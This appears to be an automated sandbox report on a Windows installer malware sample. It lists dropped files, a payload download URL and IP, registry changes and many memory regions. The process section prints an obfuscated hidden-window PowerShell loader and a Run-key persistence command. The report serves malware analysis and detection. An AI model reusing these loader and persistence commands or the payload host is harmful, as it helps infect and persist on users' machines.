Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SwiftCopy_23052024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Tabsgivende.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns
|
ASCII text, with very long lines (52697), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Tabsgivende.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onuf0bov.2vx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqmiw5gs.ome.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrometer.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Clas.Fre
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Betnksomst.sir
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Deagol.lyn
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\Elmore.whi
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\cellinas.pre
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\computerbrugeres.sts
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\flokken.ave
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\hydrolytisk.cun
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\initialiser.gau
|
Matlab v4 mat-file (little endian) O\261, numeric, rows 16056502, columns 1828126720, imaginary
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\philopornist.ant
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\portmantle.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\puntout.umo
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Setibo\quizdeltagerne.kle
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes\retsforflgendes.tod
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes\tankvognskrselens.blu
|
data
|
modified
|
There are 13 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SwiftCopy_23052024.exe
|
"C:\Users\user\Desktop\SwiftCopy_23052024.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Users\user\AppData\Local\Temp\Tabsgivende.exe
|
"C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere%
($Udslettelser)"
|
||
C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe
|
"C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe"
|
||
C:\Windows\SysWOW64\wlanext.exe
|
"C:\Windows\SysWOW64\wlanext.exe"
|
||
C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe
|
"C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle
minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
|
||
C:\Windows\SysWOW64\Magnify.exe
|
"C:\Windows\SysWOW64\Magnify.exe"
|
There are 2 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://www.innovativebuildingsolutions.in/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
|
unknown
|
||
http://www.ftp.ftp://ftp.gopher.
|
unknown
|
||
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.
|
unknown
|
||
http://crl.microsoft3m
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin
|
103.21.58.98
|
There are 10 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
www.innovativebuildingsolutions.in
|
unknown
|
||
innovativebuildingsolutions.in
|
103.21.58.98
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
103.21.58.98
|
innovativebuildingsolutions.in
|
United Arab Emirates
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\Oplukkelig
|
Bractlets52
|
||
HKEY_CURRENT_USER\Environment
|
Jordbesiddere
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
A00000
|
trusted library allocation
|
page read and write
|
||
A40000
|
trusted library allocation
|
page read and write
|
||
2D10000
|
unkown
|
page execute and read and write
|
||
221D0000
|
unclassified section
|
page execute and read and write
|
||
4C0000
|
system
|
page execute and read and write
|
||
52D0000
|
system
|
page execute and read and write
|
||
9E4D000
|
direct allocation
|
page execute and read and write
|
||
22840000
|
unclassified section
|
page execute and read and write
|
||
A9E000
|
heap
|
page read and write
|
||
43EE000
|
stack
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
5353000
|
system
|
page execute and read and write
|
||
EFD000
|
stack
|
page read and write
|
||
656F000
|
stack
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
B60000
|
unkown
|
page readonly
|
||
4C90000
|
heap
|
page read and write
|
||
224F0000
|
direct allocation
|
page execute and read and write
|
||
6610000
|
heap
|
page read and write
|
||
6F0E000
|
stack
|
page read and write
|
||
80E000
|
stack
|
page read and write
|
||
6FE0000
|
trusted library allocation
|
page execute and read and write
|
||
870000
|
heap
|
page read and write
|
||
73CBF000
|
unkown
|
page readonly
|
||
F8E000
|
unkown
|
page readonly
|
||
2340000
|
heap
|
page read and write
|
||
6694000
|
heap
|
page read and write
|
||
2370000
|
direct allocation
|
page read and write
|
||
94E000
|
stack
|
page read and write
|
||
65BE000
|
stack
|
page read and write
|
||
1138000
|
heap
|
page read and write
|
||
21FB0000
|
remote allocation
|
page read and write
|
||
66BA000
|
heap
|
page read and write
|
||
2670000
|
heap
|
page read and write
|
||
AB0000
|
unkown
|
page readonly
|
||
C64D000
|
direct allocation
|
page execute and read and write
|
||
F95000
|
unkown
|
page read and write
|
||
2CFD000
|
stack
|
page read and write
|
||
66B1000
|
heap
|
page read and write
|
||
780000
|
unkown
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
442E000
|
stack
|
page read and write
|
||
7FDE000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
6FF0000
|
trusted library allocation
|
page read and write
|
||
2EBE000
|
unkown
|
page read and write
|
||
6790000
|
direct allocation
|
page read and write
|
||
F81000
|
unkown
|
page execute read
|
||
65D0000
|
heap
|
page execute and read and write
|
||
BE0000
|
unkown
|
page read and write
|
||
A90000
|
unkown
|
page readonly
|
||
22619000
|
direct allocation
|
page execute and read and write
|
||
6675000
|
heap
|
page read and write
|
||
6659000
|
heap
|
page read and write
|
||
9F0000
|
unkown
|
page read and write
|
||
2490000
|
heap
|
page read and write
|
||
F00000
|
unkown
|
page read and write
|
||
6770000
|
direct allocation
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
2AD0000
|
unkown
|
page readonly
|
||
B5C000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
6C50000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
87C000
|
heap
|
page read and write
|
||
3288000
|
unclassified section
|
page read and write
|
||
5491000
|
trusted library allocation
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
A58000
|
heap
|
page read and write
|
||
9E1000
|
unkown
|
page readonly
|
||
4BC0000
|
heap
|
page read and write
|
||
329E000
|
unclassified section
|
page read and write
|
||
22F0000
|
direct allocation
|
page read and write
|
||
2E9C000
|
unkown
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
6D12000
|
heap
|
page read and write
|
||
6662000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
7CC000
|
unkown
|
page readonly
|
||
2ED0000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
6980000
|
heap
|
page read and write
|
||
73CB6000
|
unkown
|
page readonly
|
||
66AF000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
22210000
|
heap
|
page read and write
|
||
7030000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
22346000
|
heap
|
page read and write
|
||
BF1000
|
unkown
|
page readonly
|
||
2380000
|
direct allocation
|
page read and write
|
||
30EE000
|
unkown
|
page read and write
|
||
2E3D000
|
stack
|
page read and write
|
||
6840000
|
heap
|
page read and write
|
||
64F0000
|
heap
|
page read and write
|
||
70B0000
|
trusted library allocation
|
page read and write
|
||
AB0000
|
unkown
|
page readonly
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
64CE000
|
stack
|
page read and write
|
||
6720000
|
direct allocation
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
8A4D000
|
direct allocation
|
page execute and read and write
|
||
1040000
|
heap
|
page read and write
|
||
90E000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2BC2000
|
unkown
|
page read and write
|
||
7FB2000
|
heap
|
page read and write
|
||
2E5E000
|
stack
|
page read and write
|
||
5350000
|
system
|
page execute and read and write
|
||
21FB0000
|
remote allocation
|
page read and write
|
||
3076000
|
heap
|
page read and write
|
||
671F000
|
stack
|
page read and write
|
||
4030000
|
heap
|
page read and write
|
||
1044000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
1098000
|
heap
|
page read and write
|
||
1620000
|
unkown
|
page readonly
|
||
7DDC000
|
stack
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
7CC000
|
unkown
|
page readonly
|
||
6D44000
|
heap
|
page read and write
|
||
2EA8000
|
unkown
|
page read and write
|
||
6678000
|
heap
|
page read and write
|
||
7B3000
|
unkown
|
page readonly
|
||
E60000
|
heap
|
page read and write
|
||
6694000
|
heap
|
page read and write
|
||
944D000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
B50000
|
unkown
|
page readonly
|
||
342E000
|
stack
|
page read and write
|
||
5FAE000
|
stack
|
page read and write
|
||
6750000
|
direct allocation
|
page read and write
|
||
7D0000
|
trusted library allocation
|
page read and write
|
||
53CE000
|
system
|
page execute and read and write
|
||
649000
|
unkown
|
page execute read
|
||
401000
|
unkown
|
page execute read
|
||
2390000
|
direct allocation
|
page read and write
|
||
7CC000
|
unkown
|
page readonly
|
||
F60000
|
unkown
|
page readonly
|
||
6C20000
|
heap
|
page execute and read and write
|
||
5F6D000
|
stack
|
page read and write
|
||
7A8000
|
unkown
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
346B000
|
heap
|
page read and write
|
||
AA0000
|
unkown
|
page readonly
|
||
38E0000
|
heap
|
page read and write
|
||
22190000
|
direct allocation
|
page read and write
|
||
21DAC000
|
stack
|
page read and write
|
||
5E4000
|
unkown
|
page execute read
|
||
21ACE000
|
stack
|
page read and write
|
||
2FA2000
|
unclassified section
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
6694000
|
heap
|
page read and write
|
||
563A000
|
trusted library allocation
|
page read and write
|
||
7010000
|
trusted library allocation
|
page read and write
|
||
B24D000
|
direct allocation
|
page execute and read and write
|
||
66AF000
|
heap
|
page read and write
|
||
B80000
|
unkown
|
page readonly
|
||
7E1C000
|
stack
|
page read and write
|
||
6BEE000
|
stack
|
page read and write
|
||
667A000
|
heap
|
page read and write
|
||
26F8000
|
heap
|
page read and write
|
||
21E10000
|
direct allocation
|
page read and write
|
||
667A000
|
heap
|
page read and write
|
||
2660000
|
heap
|
page read and write
|
||
7B1000
|
unkown
|
page read and write
|
||
2EB5000
|
unkown
|
page read and write
|
||
6820000
|
direct allocation
|
page read and write
|
||
15C0000
|
unkown
|
page readonly
|
||
22473000
|
heap
|
page read and write
|
||
7CF000
|
stack
|
page read and write
|
||
D04D000
|
direct allocation
|
page execute and read and write
|
||
5E6000
|
unkown
|
page execute read
|
||
64F5000
|
heap
|
page read and write
|
||
5E2D000
|
remote allocation
|
page execute and read and write
|
||
666E000
|
heap
|
page read and write
|
||
10AB000
|
heap
|
page read and write
|
||
6659000
|
heap
|
page read and write
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
23B0000
|
direct allocation
|
page read and write
|
||
21D6F000
|
stack
|
page read and write
|
||
7040000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
2FC8000
|
heap
|
page read and write
|
||
9D9000
|
heap
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
329C000
|
stack
|
page read and write
|
||
65E0000
|
heap
|
page read and write
|
||
950000
|
unkown
|
page readonly
|
||
2EBE000
|
unkown
|
page read and write
|
||
4BF0000
|
heap
|
page read and write
|
||
33EE000
|
unkown
|
page read and write
|
||
960000
|
unkown
|
page readonly
|
||
22199000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
31CF000
|
stack
|
page read and write
|
||
2E60000
|
heap
|
page read and write
|
||
9A8000
|
heap
|
page read and write
|
||
657F000
|
stack
|
page read and write
|
||
E50000
|
unkown
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
4491000
|
trusted library allocation
|
page read and write
|
||
8B0000
|
unkown
|
page readonly
|
||
67C0000
|
direct allocation
|
page read and write
|
||
5EE000
|
unkown
|
page execute read
|
||
7C3000
|
unkown
|
page readonly
|
||
58F000
|
heap
|
page read and write
|
||
4DE0000
|
direct allocation
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
6C75000
|
heap
|
page read and write
|
||
976000
|
heap
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
E20000
|
unkown
|
page readonly
|
||
7BD0000
|
heap
|
page read and write
|
||
3FF5000
|
trusted library allocation
|
page execute and read and write
|
||
950000
|
unkown
|
page readonly
|
||
59D000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
382F000
|
stack
|
page read and write
|
||
7B6E000
|
stack
|
page read and write
|
||
3FE0000
|
trusted library allocation
|
page read and write
|
||
785000
|
unkown
|
page read and write
|
||
661E000
|
stack
|
page read and write
|
||
2E95000
|
heap
|
page read and write
|
||
3FD0000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
22D67000
|
unclassified section
|
page execute and read and write
|
||
6662000
|
heap
|
page read and write
|
||
4EB3000
|
trusted library allocation
|
page read and write
|
||
2261D000
|
direct allocation
|
page execute and read and write
|
||
7C5000
|
unkown
|
page readonly
|
||
B1A000
|
stack
|
page read and write
|
||
6EC0000
|
trusted library allocation
|
page read and write
|
||
446C000
|
stack
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
F8E000
|
unkown
|
page readonly
|
||
27DA000
|
heap
|
page read and write
|
||
9A0000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
2E1E000
|
unkown
|
page read and write
|
||
70A0000
|
trusted library allocation
|
page read and write
|
||
45C000
|
stack
|
page read and write
|
||
6E60000
|
trusted library allocation
|
page read and write
|
||
7C3000
|
unkown
|
page readonly
|
||
2EB7000
|
unkown
|
page read and write
|
||
182D000
|
remote allocation
|
page execute and read and write
|
||
669F000
|
stack
|
page read and write
|
||
6F8E000
|
stack
|
page read and write
|
||
F8E000
|
unkown
|
page readonly
|
||
32F0000
|
heap
|
page read and write
|
||
997000
|
heap
|
page read and write
|
||
B9F000
|
stack
|
page read and write
|
||
17C000
|
stack
|
page read and write
|
||
7BC5000
|
trusted library allocation
|
page read and write
|
||
7FC7000
|
heap
|
page read and write
|
||
3295000
|
unclassified section
|
page read and write
|
||
1130000
|
heap
|
page read and write
|
||
667A000
|
heap
|
page read and write
|
||
7A87000
|
stack
|
page read and write
|
||
221D0000
|
direct allocation
|
page read and write
|
||
7A90000
|
heap
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
F95000
|
unkown
|
page read and write
|
||
DF0000
|
unkown
|
page read and write
|
||
49B000
|
stack
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
653E000
|
stack
|
page read and write
|
||
BE0000
|
direct allocation
|
page execute and read and write
|
||
221D0000
|
direct allocation
|
page read and write
|
||
2218C000
|
stack
|
page read and write
|
||
E66000
|
heap
|
page read and write
|
||
2BC2000
|
unkown
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
23A0000
|
direct allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
84E000
|
stack
|
page read and write
|
||
6970000
|
heap
|
page read and write
|
||
BE0000
|
unkown
|
page read and write
|
||
7080000
|
trusted library allocation
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
5F2000
|
unkown
|
page execute read
|
||
21F1D000
|
stack
|
page read and write
|
||
21E40000
|
direct allocation
|
page read and write
|
||
970000
|
unkown
|
page readonly
|
||
1B8000
|
stack
|
page read and write
|
||
7C5000
|
unkown
|
page readonly
|
||
4020000
|
heap
|
page readonly
|
||
8747000
|
trusted library allocation
|
page read and write
|
||
2350000
|
direct allocation
|
page read and write
|
||
970000
|
unkown
|
page readonly
|
||
871000
|
heap
|
page read and write
|
||
98E000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
64F7000
|
heap
|
page read and write
|
||
2525000
|
heap
|
page read and write
|
||
6694000
|
heap
|
page read and write
|
||
7B3000
|
unkown
|
page readonly
|
||
333E000
|
stack
|
page read and write
|
||
54FB000
|
trusted library allocation
|
page read and write
|
||
372F000
|
unkown
|
page read and write
|
||
890000
|
unkown
|
page readonly
|
||
4C10000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
999000
|
heap
|
page read and write
|
||
A34000
|
heap
|
page read and write
|
||
70FB000
|
stack
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
2F14000
|
heap
|
page read and write
|
||
3430000
|
heap
|
page read and write
|
||
22832000
|
direct allocation
|
page execute and read and write
|
||
F00000
|
unkown
|
page read and write
|
||
7C5000
|
unkown
|
page readonly
|
||
6D30000
|
heap
|
page read and write
|
||
6694000
|
heap
|
page read and write
|
||
10D5000
|
unkown
|
page read and write
|
||
2AEF000
|
stack
|
page read and write
|
||
960000
|
unkown
|
page readonly
|
||
3237000
|
unkown
|
page execute and read and write
|
||
7FDA000
|
heap
|
page read and write
|
||
5E8000
|
unkown
|
page execute read
|
||
666E000
|
heap
|
page read and write
|
||
6662000
|
heap
|
page read and write
|
||
666E000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
21F5D000
|
stack
|
page read and write
|
||
7F32000
|
heap
|
page read and write
|
||
78E000
|
stack
|
page read and write
|
||
22DD4000
|
unclassified section
|
page execute and read and write
|
||
871000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
2771000
|
heap
|
page read and write
|
||
7B3000
|
unkown
|
page readonly
|
||
F97000
|
unkown
|
page readonly
|
||
667A000
|
heap
|
page read and write
|
||
2C20000
|
unkown
|
page readonly
|
||
EB1000
|
direct allocation
|
page execute and read and write
|
||
22D0000
|
direct allocation
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2C10000
|
heap
|
page read and write
|
||
B20000
|
trusted library allocation
|
page execute and read and write
|
||
7B6000
|
unkown
|
page readonly
|
||
7020000
|
trusted library allocation
|
page read and write
|
||
65E8000
|
heap
|
page read and write
|
||
1080000
|
unkown
|
page read and write
|
||
21FEE000
|
stack
|
page read and write
|
||
F81000
|
unkown
|
page execute read
|
||
A90000
|
unkown
|
page readonly
|
||
4BAD000
|
trusted library allocation
|
page read and write
|
||
B60000
|
unkown
|
page readonly
|
||
73CA1000
|
unkown
|
page execute read
|
||
871000
|
heap
|
page read and write
|
||
224E4000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
8A0000
|
unkown
|
page readonly
|
||
38F0000
|
heap
|
page read and write
|
||
22222000
|
heap
|
page read and write
|
||
2EFC000
|
heap
|
page read and write
|
||
6BAE000
|
stack
|
page read and write
|
||
F97000
|
unkown
|
page readonly
|
||
77B000
|
unkown
|
page read and write
|
||
4A2D000
|
remote allocation
|
page execute and read and write
|
||
7B6000
|
unkown
|
page readonly
|
||
3FF2000
|
trusted library allocation
|
page read and write
|
||
64D0000
|
trusted library allocation
|
page read and write
|
||
6C65000
|
heap
|
page read and write
|
||
9EB000
|
heap
|
page read and write
|
||
AA0000
|
unkown
|
page readonly
|
||
2E80000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
6678000
|
heap
|
page read and write
|
||
7050000
|
trusted library allocation
|
page read and write
|
||
1191000
|
unkown
|
page read and write
|
||
67D0000
|
direct allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
21B0E000
|
stack
|
page read and write
|
||
45E6000
|
trusted library allocation
|
page read and write
|
||
2C20000
|
unkown
|
page readonly
|
||
327C000
|
unclassified section
|
page read and write
|
||
D09000
|
direct allocation
|
page execute and read and write
|
||
240000
|
heap
|
page read and write
|
||
981000
|
heap
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
CFC000
|
stack
|
page read and write
|
||
F95000
|
unkown
|
page read and write
|
||
65D5000
|
heap
|
page execute and read and write
|
||
BCD000
|
heap
|
page read and write
|
||
7FE2000
|
heap
|
page read and write
|
||
27F0000
|
direct allocation
|
page read and write
|
||
91A000
|
stack
|
page read and write
|
||
2268E000
|
direct allocation
|
page execute and read and write
|
||
2208C000
|
stack
|
page read and write
|
||
F81000
|
unkown
|
page execute read
|
||
585000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
271C000
|
heap
|
page read and write
|
||
99F000
|
heap
|
page read and write
|
||
2346000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
21E30000
|
direct allocation
|
page read and write
|
||
3297000
|
unclassified section
|
page read and write
|
||
7B2E000
|
stack
|
page read and write
|
||
6E50000
|
trusted library allocation
|
page read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
665B000
|
heap
|
page read and write
|
||
871000
|
heap
|
page read and write
|
||
22E0000
|
direct allocation
|
page read and write
|
||
4010000
|
trusted library allocation
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
652E000
|
stack
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
15C0000
|
unkown
|
page readonly
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
EFD000
|
stack
|
page read and write
|
||
21FB0000
|
remote allocation
|
page read and write
|
||
70000
|
heap
|
page read and write
|
||
2EA8000
|
unkown
|
page read and write
|
||
6800000
|
direct allocation
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
F80000
|
unkown
|
page readonly
|
||
BC4D000
|
direct allocation
|
page execute and read and write
|
||
6E70000
|
trusted library allocation
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
A28000
|
heap
|
page read and write
|
||
1660000
|
remote allocation
|
page execute and read and write
|
||
F80000
|
unkown
|
page readonly
|
||
120C000
|
unkown
|
page read and write
|
||
587000
|
heap
|
page read and write
|
||
2E7E000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
542D000
|
remote allocation
|
page execute and read and write
|
||
5EA000
|
unkown
|
page execute read
|
||
22030000
|
heap
|
page read and write
|
||
73CBD000
|
unkown
|
page read and write
|
||
8130000
|
trusted library allocation
|
page execute and read and write
|
||
F97000
|
unkown
|
page readonly
|
||
7060000
|
trusted library allocation
|
page read and write
|
||
21E20000
|
direct allocation
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
667A000
|
heap
|
page read and write
|
||
252D000
|
heap
|
page read and write
|
||
5F0000
|
unkown
|
page execute read
|
||
7FAE000
|
heap
|
page read and write
|
||
2E9C000
|
unkown
|
page read and write
|
||
73CA0000
|
unkown
|
page readonly
|
||
21B4E000
|
stack
|
page read and write
|
||
A80000
|
trusted library allocation
|
page read and write
|
||
667A000
|
heap
|
page read and write
|
||
F80000
|
unkown
|
page readonly
|
||
26E4000
|
trusted library allocation
|
page read and write
|
||
1290000
|
unkown
|
page readonly
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
1230000
|
unkown
|
page readonly
|
||
33A0000
|
heap
|
page read and write
|
||
1044000
|
heap
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page execute and read and write
|
||
22211000
|
heap
|
page read and write
|
||
B1A000
|
stack
|
page read and write
|
||
8A0000
|
unkown
|
page readonly
|
||
2C2D000
|
remote allocation
|
page execute and read and write
|
||
26E3000
|
trusted library allocation
|
page execute and read and write
|
||
6760000
|
direct allocation
|
page read and write
|
||
4470000
|
trusted library allocation
|
page execute and read and write
|
||
58E000
|
heap
|
page read and write
|
||
6730000
|
direct allocation
|
page read and write
|
||
8140000
|
direct allocation
|
page execute and read and write
|
||
871000
|
heap
|
page read and write
|
||
67A0000
|
direct allocation
|
page read and write
|
||
21ECF000
|
stack
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
9F0000
|
unkown
|
page read and write
|
||
3FEA000
|
trusted library allocation
|
page execute and read and write
|
||
9D0000
|
unkown
|
page read and write
|
||
2729000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
890000
|
unkown
|
page readonly
|
||
FEE000
|
stack
|
page read and write
|
||
7A1000
|
unkown
|
page read and write
|
||
2EB5000
|
unkown
|
page read and write
|
||
5EC000
|
unkown
|
page execute read
|
||
2F80000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
44F1000
|
trusted library allocation
|
page read and write
|
||
2F14000
|
heap
|
page read and write
|
||
6810000
|
direct allocation
|
